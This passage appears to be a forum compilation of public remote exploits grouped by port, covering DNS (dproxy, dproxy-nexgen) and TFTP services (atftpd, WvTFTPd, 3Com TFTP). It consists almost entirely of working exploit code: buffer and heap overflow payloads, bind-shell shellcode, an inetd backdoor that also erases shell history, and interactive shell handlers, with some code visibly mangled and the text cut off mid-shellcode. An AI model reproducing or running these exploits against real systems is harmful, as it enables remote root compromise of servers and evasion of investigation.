}
reclen = sizeof(sa);
len = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&sa, &reclen);
if (len < 0)
{
printf("[x] unable to receive iquery answer\n");
return(-1);
}
printf(" iquery resp len = %d\n", len);
offset = xtract_offset(buff, len);
printf(" retrieved stack offset = %x\n", offset);
len = evil_query(buff, offset);
if(len < 0){
printf("[x] error sending tsig packet\n");
return(0);
}
sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (0 > close(sock))
{
return(-1);
}
connection(sa);
return(0);
}
// [2001-03-02]
53 dproxy <= 0.5 Remote Buffer Overflow Exploit (meta 2.7)
# MetaSploit exploit for remote buffer overflow issue in dproxy
# Written in 2007 by Alexander Klink
# (c) 2007 Cynops GmbH
# released under the same license as MSF (Artistic, GPL dual-licensed)
# $Revision: 1.1 $
package Msf::Exploit::dproxy;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Udp;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'dproxy v0.1 - v0.5 buffer overflow exploit',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'Alexander Klink, Cynops GmbH', ],
'Arch' => [ 'x86' ],
'OS' => [ 'linux'],
'Priv' => 0,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
},
'Payload' => {
'Space' => 500,
'BadChars' => "\x00",
},
'Description' => Pex::Text::Freeform(qq{
This exploits a buffer overflow in dproxy version 0.1 to 0.5.
}),
'Refs' => [
[ 'CVE', '2007-1465' ],
],
'DefaultTarget' => 0,
'Targets' => [
['Linux', 0xbfffe480],
],
'Keys' => [ 'dproxy' ],
'DisclosureDate' => 'Mar 20 2007',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced
}, @_
);
return $self;
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = 53;
my $targetIndex = $self->GetVar('TARGET');
my $srcPort = $self->GetVar('CPORT');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
if (! $self->InitNops(512)) {
$self->PrintLine("Could not initialize the nop module");
return;
}
my $sock = Msf::Socket::Udp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
'LocalPort' => $srcPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
$self->PrintLine('Trying ' . $target->[0] . ' (' . $targetHost . ')');
my $evil = 'A' x 1000 . $self->MakeNops(500) . $shellcode
. 'A' x (2073 - 1500 - length($shellcode)) . pack('V', $target->[1]);
$sock->Send($evil);
return;
}
1;
# [2007-03-23]
53 dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)
/* dproxy-v1.c
*
* Copyright (c) 2007 by <[email protected]>
*
* dproxy-nexgen remote root exploit (x86-lnx)
* by mu-b - Mar 2007
*
* - Tested on: dproxy-nexgen (.tar.gz)
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#define BUF_SIZE 512
#define NOP 0x41
#define DEF_PORT 53
#define PORT_DNS DEF_PORT
#define PORT_SHELL 4444
const u_char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const u_char *name;
const int len;
const int zshell_pos;
const u_char *zshell;
const int fp_pos;
const u_long fp;
};
/* fp = objdump -D dproxy | grep "ff e2" */
struct target_t targets[] = {
{"dproxy-nexgen (tar.gz)",
512, 25, bndshell_lnx, 284, 0x08048cf9}
,
{"dproxy-nexgen (tar.gz, Debian stable)",
512, 25, bndshell_lnx, 281, 0x08048cf8}
,
{0}
};
static int sock_send (int sock, u_char * src, int len);
static int sock_recv (int sock, u_char * dst, int len);
static void sock_send_udp (u_char * host, int port, u_char * src, int len);
static int sockami (u_char * host, int port);
static void shellami (int sock);
static void zbuffami (u_char * zbuf, struct target_t *trgt);
static int
sock_send (int sock, u_char * src, int len)
{
int sbytes;
sbytes = send (sock, src, len, 0);
return (sbytes);
}
static int
sock_recv (int sock, u_char * dst, int len)
{
int rbytes;
rbytes = recv (sock, dst, len, 0);
if (rbytes >= 0)
dst[rbytes] = '\0';
return (rbytes);
}
static void
sock_send_udp (u_char * host, int port, u_char * src, int len)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address));
}
static int
sockami (u_char * host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
{
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}
static void
shellami (int sock)
{
int n;
fd_set rset;
u_char recvbuf[1024], *cmd = "id; uname -a; uptime\n";
sock_send (sock, cmd, strlen (cmd));
while (1)
{
FD_ZERO (&rset);
FD_SET (sock, &rset);
FD_SET (STDIN_FILENO, &rset);
select (sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET (sock, &rset))
{
if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0)
{
fprintf (stderr, "Connection closed by foreign host.\n");
exit (EXIT_SUCCESS);
}
printf ("%s", recvbuf);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0)
{
recvbuf[n] = '\0';
sock_send (sock, recvbuf, n);
}
}
}
}
static void
zbuffami (u_char * zbuf, struct target_t *trgt)
{
int i;
u_char *ptr;
ptr = zbuf;
memset (ptr, NOP, trgt->len);
*ptr++ = 0x69; /* transaction id */
*ptr++ = 0x69;
*ptr++ = 0x81; /* flags */
*ptr++ = 0x80;
*ptr++ = 0x00; /* number of questions */
*ptr++ = 0x00;
*ptr++ = 0x00; /* number of answers */
*ptr++ = 0x01;
*ptr++ = 0x00; /* number of authority rr's */
*ptr++ = 0x00;
*ptr++ = 0x00; /* number of additional rr's */
*ptr++ = 0x00;
*ptr++ = 0xc0; /* compressed name &ptr+18 */
*ptr++ = 0x18;
*ptr++ = 0x00; /* type = PTR */
*ptr++ = 0x0c;
*ptr++ = 0x07; /* class = jmp short +0x07 */
*ptr++ = 0xeb;
*ptr++ = 0xff; /* ttl */
*ptr++ = 0xff;
*ptr++ = 0xff;
*ptr++ = 0xff;
*ptr++ = 0x01; /* data length = 488 bytes */
*ptr++ = 0xe8;
/* wire format name */
for (i = 0; i < 2; i++, ptr += 0x7f) {
*ptr++ = 0x7f;
memset (ptr, NOP, 0x7f);
}
*ptr++ = 0x02; /* padding */
*ptr++ = NOP;
*ptr++ = NOP;
*ptr++ = 0x00; /* terminate name */
/* terminate buffer */
ptr = zbuf + trgt->len - 1;
*ptr-- = 0x2e;
*ptr = 0x2e;
memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));
zbuf[trgt->fp_pos] = (u_char) (trgt->fp & 0x000000ff);
zbuf[trgt->fp_pos + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
zbuf[trgt->fp_pos + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
zbuf[trgt->fp_pos + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
}
int
main (int argc, char **argv)
{
int sock;
u_char zbuf[BUF_SIZE];
struct target_t *trgt;
printf ("dproxy-nexgen remote root exploit\n"
"by: <[email protected]>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if (argc <= 2)
{
fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
exit (EXIT_SUCCESS);
}
if (atoi (argv[2]) >= NUM_TARGETS)
{
fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
exit (EXIT_SUCCESS);
}
trgt = &targets[atoi (argv[2])];
printf ("+Attacking to %s...\n", argv[1]);
printf ("fp: 0x%x\n", (int) trgt->fp);
printf ("buf len: %d\n", trgt->len);
printf ("+Building buffer with shellcode...");
memset (zbuf, 0x00, sizeof (zbuf));
zbuffami (zbuf, trgt);
printf (" done\n");
printf ("+Sending Payload...");
sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE);
printf (" done\n");
printf ("+Waiting for the shellcode to be executed...\n");
sleep (1);
sock = sockami (argv[1], PORT_SHELL);
printf ("+Wh00t!\n\n");
shellami (sock);
return (EXIT_SUCCESS);
}
// [2007-03-30]
#################################
انتهينا من بورت 53
################################
نبداء بـ بورت 69
69 Atftpd 0.6 Remote Root Exploit (atftpdx.c)
/**
** PoC linux/86 remote exploit against atftpd (c) gunzip ( FIXED )
**
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#define HEAP_START 0x080514b4
#define HEAP_END 0x080594b4
#define BACKDOOR "rfe" /* port MUST be > 1024 */
#define NOPNUM 128 /* number of nops */
#define PORT 69 /* tftpd port */
#define BUFSIZE 512 /* size of exploit buffer */
#define TIMEOUT 0x5 /* timeout in sec. */
#define NOALARM 0x0 /* no timeout */
#define RRQ 0x1 /* request method */
#define MODE "octet" /* request mode */
#define OFFSET 16000 /* distance of nops from heap */
struct target {
char * name ;
unsigned int align ;
unsigned int len ;
unsigned int retaddr ;
} tg[] =
{
{ "Linux (Debian 3.0)", 0, 264, 0x0805560c },
{ NULL, 0, 0, 0 }
};
char shellcode[]= /* taken from lsd-pl.net */
"\xeb\x22" /* jmp <cmdshellcode+36> */
"\x59" /* popl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x66\x68""-c" /* pushw $0x632d */
"\x89\xe7" /* movl %esp,%edi */
"\x50" /* pushl %eax */
"\x51" /* pushl %ecx */
"\x57" /* pushl %edi */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
"\xe8\xd9\xff\xff\xff" /* call <cmdshellcode+2> */
"echo " BACKDOOR " stream tcp nowait nobody /bin/sh sh -i>/tmp/.x ;/usr/sbin/inetd /tmp/.x;"
;
void timeout( int sig )
{
alarm( NOALARM );
signal( SIGALRM, SIG_DFL );
fprintf(stderr,"[-] Timeout.\n");
exit( EXIT_FAILURE );
}
int shell( int fd )
{
int rd ;
fd_set rfds;
static char buff[ 1024 ];
char INIT_CMD[] = "unset HISTFILE; rm -f /tmp/.x; echo; id; uname -a\n";
write(fd, INIT_CMD, strlen( INIT_CMD ));
while(1) {
FD_ZERO( &rfds );
FD_SET(0, &rfds);
FD_SET(fd, &rfds);
if(select(fd+1, &rfds, NULL, NULL, NULL) < 1) {
perror("[-] Select");
exit( EXIT_FAILURE );
}
if( FD_ISSET(0, &rfds) ) {
if( (rd = read(0, buff, sizeof(buff))) < 1) {
perror("[-] Read");
exit( EXIT_FAILURE );
}
if( write(fd,buff,rd) != rd) {
perror("[-] Write");
exit( EXIT_FAILURE );
}
}
if( FD_ISSET(fd, &rfds) ) {
if( (rd = read(fd, buff, sizeof(buff))) < 1) {
exit( EXIT_SUCCESS );
}
write(1, buff, rd);
}
}
}
int try( unsigned short bport, unsigned long ip )
{
int sockfd ;
struct sockaddr_in sheep ;
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("[-] Socket");
exit( EXIT_FAILURE );
}
sheep.sin_family = AF_INET;
sheep.sin_addr.s_addr = ip ;
sheep.sin_port = htons ( bport );
signal( SIGALRM, timeout );
alarm( TIMEOUT );
if ( connect(sockfd,(struct sockaddr *)&sheep,sizeof(sheep)) == -1 )
{
alarm( NOALARM );
signal(SIGALRM,SIG_DFL);
return 0;
}
alarm( NOALARM );
signal(SIGALRM,SIG_DFL);
return sockfd ;
}
char * xp_make_str( unsigned int len, unsigned int align, unsigned long retaddr )
{
int c ;
char * xp = (char *)calloc( BUFSIZE, sizeof(char) );
char * code = shellcode ;
if( !xp ) {
fprintf(stderr, "[-] Not enough memory !\n");
exit( EXIT_FAILURE );
}
/* stupid check */
if (( align + len ) > (BUFSIZE - strlen( shellcode ) - 32)) {
fprintf(stderr, "[-] String too long or align too high.\n");
exit( EXIT_FAILURE );
}
/*
* our buffer shoud look like this
*
* [ NOPS ][ SHELLCODE ][ RETADDR * 4 ][ 0 ][ MODE ][ 0 ][ NOPS ][ SHELLCODE ]
* |_____> len
*/
memset ( xp, 0x41, BUFSIZE );
memcpy( xp + len - strlen( code ) - 16, code, strlen( code ));
for ( c = align + len - 16 ; c < len ; c += 4 )
*(long *)( xp + c ) = retaddr ;
*( xp ) = 0x0 ;
*( xp + 1 ) = RRQ ;
*( xp + len )= '\0' ;
memcpy( xp + len + 1, MODE, strlen( MODE ));
*( xp + len + 1 + strlen( MODE )) = '\0' ;
memcpy ( xp + BUFSIZE - strlen( code ), code, strlen( code ));
return xp ;
}
void usage( char * a )
{
int o = 0 ;
fprintf(stderr,
"__Usage: %s -h host -t target [options]\n\n"
"-o\toffset\n"
"-a\talign\n"
"-s\tstep for bruteforcing (try 120 <= step <= 512)\n"
"-l\tlength of filename\n"
"-v\ttreceives packets too (check if daemon's crashed)\n"
"-b\tenables bruteforce (dangerous !)\n\n", a);
while( tg[o].name != NULL )
{
fprintf(stderr, "\t%d - %s\n", o, tg[o].name ); o++ ;
}
fprintf( stderr, "\n" );
exit( EXIT_FAILURE );
}
int main(int argc, char *argv[])
{
int sfd, t = 0, bport = 0, opt = 0, offset = 0,
want_receive = 0, brute = 0, yeah = 0, step = 0;
struct servent * se ;
unsigned long n ;
char * host ;
struct sockaddr_in server ;
int len = sizeof(server);
char * rbuf = (char *)calloc( BUFSIZE + 4, sizeof(char) );
char * wbuf = (char *)calloc( BUFSIZE + 4, sizeof(char) );
if ( !wbuf || !rbuf ) {
fprintf(stderr, "[-] Not enough memory !\n");
exit( EXIT_FAILURE );
}
memset(&server, 0, sizeof(server));
fprintf(stderr,"\nlinux/x86 atftpd remote exploit by gunzip\n\n");
if ( argc < 3 )
usage( argv[0] );
while ((opt = getopt(argc, argv, "bvo:a:l:h:t:s:")) != EOF) {
switch(opt)
{
case 's': step = atoi( optarg ); break ;
case 'h': host = strdup ( optarg ); break;
case 't': t = atoi(optarg); break;
case 'b': brute++ ; break ;
case 'v': want_receive++ ; break ;
case 'o': offset += atoi( optarg ); break;
case 'a': tg[t].align = atoi( optarg ); break;
case 'l': tg[t].len = atoi( optarg ); break;
default: usage( argv[0] ); break;
}
}
if (( se = getservbyname( BACKDOOR, NULL )) == NULL ) {
perror("[-] Getservbyname");
exit( EXIT_FAILURE );
}
if ((bport = ntohs( se->s_port )) < 1024 ) {
fprintf(stderr, "[-] Backdoor port must be <= 1024\n");
exit( EXIT_FAILURE );
}
if ( inet_aton( host , &server.sin_addr) == 0 ) {
struct hostent * he ;
if ( (he = gethostbyname( host )) == NULL ) {
perror("[-] Gethostbyname");
exit( EXIT_FAILURE );
}
server.sin_addr.s_addr =
((struct in_addr *)(he->h_addr))->s_addr ;
}
if ((sfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1 ) {
perror("[-] Socket");
exit( EXIT_FAILURE );
}
fprintf(stdout,"[+] Sending request to host %s\n",
inet_ntoa(server.sin_addr));
if ( !step ) step = tg[t].len / 2 ;
if ( brute ) offset += OFFSET ;
for( n = HEAP_START + offset; n < HEAP_END ; n += step ) {
fprintf(stdout,"[+] Using len=%d align=%d retaddr=0x%.8x shellcode=%d bport=%d\n",
tg[t].len, tg[t].align,
(brute ) ? (unsigned int)n : (unsigned int)tg[t].retaddr + offset,
strlen(shellcode), bport );
if ( !brute )
wbuf = xp_make_str( tg[t].len, tg[t].align, tg[t].retaddr + offset );
else
wbuf = xp_make_str( tg[t].len, tg[t].align, n );
server.sin_port = htons( PORT );
if ( sendto(sfd, wbuf,
(size_t) BUFSIZE, 0,
(struct sockaddr *)&server,
(socklen_t)sizeof(struct sockaddr)) < tg[t].len)
{
perror("[-] Sendto");
}
else if ( want_receive )
{
signal( SIGALRM, timeout );
alarm( TIMEOUT );
if ( recvfrom(sfd, rbuf,
(size_t) BUFSIZE, 0,
(struct sockaddr *)&server,
(socklen_t *)&len) != -1 )
{
alarm( NOALARM );
signal( SIGALRM, SIG_DFL);
fprintf( stdout,"[+] Received: %.2x %.2x %.2x %.2x\n",
rbuf[0],rbuf[1],rbuf[2],rbuf[3]);
}
else {
perror("[-] Recvfrom");
}
}
sleep ( 1 ) ;
if((yeah = try( bport, server.sin_addr.s_addr ))) {
shell( yeah );
exit( EXIT_SUCCESS );
}
if ( !brute ) break ;
memset( wbuf, 0, BUFSIZE + 4 );
memset( rbuf, 0, BUFSIZE + 4 );
}
return 1 ;
}
// [2003-06-10]
69 WvTFTPd 0.9 Remote Root Heap Overflow Exploit
/*
* wvtftp option name heap overflow remote root exploit
*
* infamous42md AT hotpop DOT com
*
* exploitation is not exactly straight forward. When we overflow our buffer,
* we overwrite a pointer that is freed before we get to trigger our overwrite.
* so we have to restore the state of this pointer to some sane value so it can
* be freed. after we do this, we trigger the overwrite, and hijack the
* jumpslot for malloc(). then to trigger malloc(), we send a bogus request,
* and then connect to our shell. all of the offsets should be fixed for 32 bit
* platforms, all you need to pass is the base address of the heap buffer we're
* overflowing. 'ltrace wvtftpd -dd 2>&1 | grep malloc | grep 616', and of
* course the jumpslot for malloc(), 'objdump -R wvtftpd | grep malloc'.
*
*/
#if 0
Usage: ./a.out
[ -h host ] [ -r object_heap_base ] [ -l retloc ]
[ -f remote file ] < -p port > < -a align >
[[email protected]] ./a.out -h localho -r 0x8063cd0 -l 0x0805e540
connected to localho(127.0.0.1)
exploit sent, total data len 597
triggering overwritten jumpslot
connected to localho(127.0.0.1)
got a shell
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel),11(floppy)
- Connection closed by user
#endif
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>
#define REMOTE_FILE "foo"
#define FTP_PORT 69
#define NOP 0x90
#define BS 0x1000
#define SHELL_PORT 7000
#define ALIGN 0
#define die(x) do{ perror(x); exit(1); }while(0)
/* a dlmalloc chunk descriptor */
#define CHUNKSZ sizeof(mchunk_t)
typedef struct _mchunk {
size_t prevsz;
size_t sz;
long fd;
long bk;
} mchunk_t;
/* program arguments */
typedef struct _args {
char *host,
*remote_file;
u_long object_heap_base,
retloc;
u_short port,
align;
} args;
/* call them shell code */
#define SHELL_LEN (sizeof(remote)-1)
char remote[] =
"\xeb\x0a""1234567890" /* jump */
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x 04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\x b0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\x cd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x 01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x 50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\x c9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x 73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x 80\xa1\x5f\x66\x6e\x69";
void usage(char *progname)
fprintf(stderr, "Usage: %s\n"
"\t[ -h host ] [ -r object_heap_base ] [ -l retloc ]\n"
"\t[ -f remote file ] < -p port > < -a align >\n",
progname);
exit(EXIT_FAILURE);
void parse_args(int argc, char **argv, args *argp)
int c = 0;
while((c = getopt(argc, argv, "h:p:r:a:l:")) != -1) {
switch (c) {
case 'a':
argp->align = atoi(optarg);
break;
case 'p':
argp->port = atoi(optarg);
break;
case 'r':
argp->object_heap_base = strtoul(optarg, NULL, 16);
break;
case 'l':
argp->retloc = strtoul(optarg, NULL, 16);
break;
case 'h':
argp->host = optarg;
break;
case 'f':
argp->remote_file = optarg;
break;
case ':':
case '?':
default:
usage(argv[0]);
}
}
if(optind != argc || argp->align > CHUNKSZ-1 || argp->object_heap_base == 0
||
argp->host == NULL || argp->port == 0 || argp->retloc == 0 ||
argp->remote_file == NULL)
usage(argv[0]);
int conn(char *host, u_short port, int proto)
int sock = 0;
struct hostent *hp;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
herror("gethostbyname");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, proto, 0);
if (sock < 0)
die("socket");
/* with UDP this means we can write() instead of sendto() */
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
die("connect");
printf("\nconnected to %s(%s)\n\n", host, inet_ntoa(sa.sin_addr));
return sock;
/*
* ftp packet bytes look like:
*
* 0-1 code - [0]*256 + [1] : 1 for read, 2 for write
* 2 NULL termed file name, must exist and be readable
* X NULL termed mode [ netascii octet mail ]
* Y NULL termed option name
* Z NULL termed option value : overflow with this string
* and a bad option to get our pointer freed
*/
void sploit(args *argp, int sock)
int len = 0, align = argp->align, x = 0, begin_packet_data;
long retloc = argp->retloc, object_heap_base = argp->object_heap_base;
char buf[BS], *remote_file = argp->remote_file;
mchunk_t chunk;
memset(buf, 0, BS);
memset(&chunk, 0, CHUNKSZ);
/* set opcode for reading */
buf[1] = 1;
len = 2;
/* the file to read, and the mode */
len += sprintf(buf + len, "%s", remote_file) + 1;
len += sprintf(buf + len, "%s", "octet") + 1;
/* all that follows gets copied via strcpy() */
begin_packet_data = len;
/* the option */
len += sprintf(buf+len, "%s", "blksize") + 1; /* 8 */
/* the overflow , but first a valid blocksize to past test */
len += sprintf(buf+len, "%s", "512"); /* 3 */
/*
* from here buffer looks like:
* [ align - shell - chunks - pkttimes - chunks ]
*/
#define OFFSET_TO_OUR_BUF_FROM_BASE 56
/* setup the chunk */
chunk.prevsz = 0xfffffffc;
chunk.sz = 0xfffffffc;
chunk.fd = retloc - 12;
chunk.bk = object_heap_base + OFFSET_TO_OUR_BUF_FROM_BASE + align + 11/* 8 +
3 */;
memset(buf+len, 'A', align);
len += align;
memcpy(buf+len, remote, SHELL_LEN);
len += SHELL_LEN;
#define CHUNK_BYTES 416
for(x = 0; x < CHUNK_BYTES - (CHUNKSZ - 1); x+= CHUNKSZ)
memcpy(buf+len+x, &chunk, CHUNKSZ);
len += x;
buf[len++] = 0;
/* trigger the free with a bad option (no value) */
len += sprintf(buf+len, "%s", "blksize") + 1;
/*
* the buffer we overflow is part of a larger structure that is embedded in
* a class object located on the heap. the base address of this object is
* what 'object_heap_base' refers to. the structure is 'struct TFTPConn',
* member of the 'class WvTFTPBase'. we need to repair a pointer in the
* data that we overwrite. the pkttimes member of the structure is a
* pointer to an object of type 'class PktTime' that gets deleted. in this
* destructor for the object that gets deleted, a member pointer offset 12
* bytes in, is a pointer that gets freed via delete. This freed pointer
* needs to be set up by us. You could create a fake chunk and use that,
* but it is simpler to just make that pointer be NULL as free(0) does
* nothing. there are several spots where we have a guaranteed NULL word
* inside of the 'struct TFTPConn' class object. so the idea is to point
* pkttimes 12 bytes below that NULL, so that when it goes to free the
* pointer, it will use the NULL word.
*/
/*
* our buffer is 512 bytes, and we start copying at 2 bytes in. the
* distance to pkttimes pointer is 526 bytes, rounded up to 4 byte boundary
*/
#define OFFSET_TO_PKTTIMES_IN_BUFFER 528
/*
* we point pkttimes at an area that contains guaranteed NULL word, which is
* the 'lastsent' member of the TFTPConn structure. it is the number of
* blocks which have been sent over teh connection so far. it will always
* be 0 since no blocks have been sent to us yet. if we know the base of
* the object we know where 'lastsent' is located.
*/
#define OFFSET_TO_NULL_POINTERS_FROM_BASE_MINUS_12 40
*(uint32_t *)(buf + begin_packet_data + OFFSET_TO_PKTTIMES_IN_BUFFER) =
object_heap_base + OFFSET_TO_NULL_POINTERS_FROM_BASE_MINUS_12;
write(sock, buf, len);
printf("exploit sent, total data len %d\n\n", len);
void shell(char *host, u_short port)
int sock = 0, l = 0;
char buf[BS];
fd_set rfds;
sock = conn(host, port, SOCK_STREAM);
printf("got a shell\n\n");
FD_ZERO(&rfds);
while(1){
FD_SET(STDIN_FILENO, &rfds);
FD_SET(sock, &rfds);
if(select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
die("select");
if(FD_ISSET(STDIN_FILENO, &rfds)) {
if((l = read(0, buf, BS)) <= 0)
die("\n - Connection closed by user\n");
if(write(sock, buf, l) < 1)
die("write");
}
if(FD_ISSET(sock, &rfds)) {
l = read(sock, buf, sizeof(buf));
if (l == 0)
die("\n - Connection terminated.\n");
else if(l < 0)
die("\n - Read failure\n");
if(write(1, buf, l) < 1)
die("write");
}
}
/*
* call the function whose jumpslot we overwrote, malloc()
*/
void trigger_retloc(int sock)
char buf[BS];
write(sock, buf, 200);
/*
*/
int main(int argc, char **argv)
int sock = 0;
args argy;
memset(&argy, 0, sizeof(argy));
argy.align = ALIGN;
argy.port = FTP_PORT;
argy.remote_file = REMOTE_FILE;
parse_args(argc, argv, &argy);
sock = conn(argy.host, argy.port, SOCK_DGRAM);
sploit(&argy, sock);
sleep(2);
printf("triggering overwritten jumpslot\n\n");
trigger_retloc(sock);
sleep(1);
close(sock);
shell(argy.host, SHELL_PORT);
return EXIT_SUCCESS;
// [2004-10-28]
69 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
# 3comtftpd_xpsp2.rb
#
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the 3Com TFTP Service version 2.0.1
# long transporting mode buffer overflow under xp sp2 english
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb <victimhost> <victimport>
# Default port is 69 if not specified
require 'socket'
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\x ea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x 7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\x ec\x9e\x7b\x8f"
sc1 +="\xae\x2b\x7b\x62\x05\x6e\x71\x1b\x03\x6d\x50\xe2\x 39\xfb\x9f\x3e"
sc1 +="\x77\x4a\x30\x49\x26\xae\x50\x70\x89\xa3\xf0\x9d\x 5d\xb3\xba\xfd"
sc1 +="\x01\x83\x30\x9f\x6e\x8b\xa7\x77\xc1\x9e\x60\x72\x 89\xec\x8b\x9d"
sc1 +="\x42\xa3\x30\x66\x1e\x02\x30\x56\x0a\xf1\xd3\x98\x 4c\xa1\x57\x46"
sc1 +="\xfd\x79\xdd\x45\x64\xc7\x88\x24\x6a\xd8\xc8\x24\x 5d\xfb\x44\xc6"
sc1 +="\x6a\x64\x56\xea\x39\xff\x44\xc0\x5d\x26\x5e\x70\x 83\x42\xb3\x14"
sc1 +="\x57\xc5\xb9\xe9\xd2\xc7\x62\x1f\xf7\x02\xec\xe9\x d4\xfc\xe8\x45"
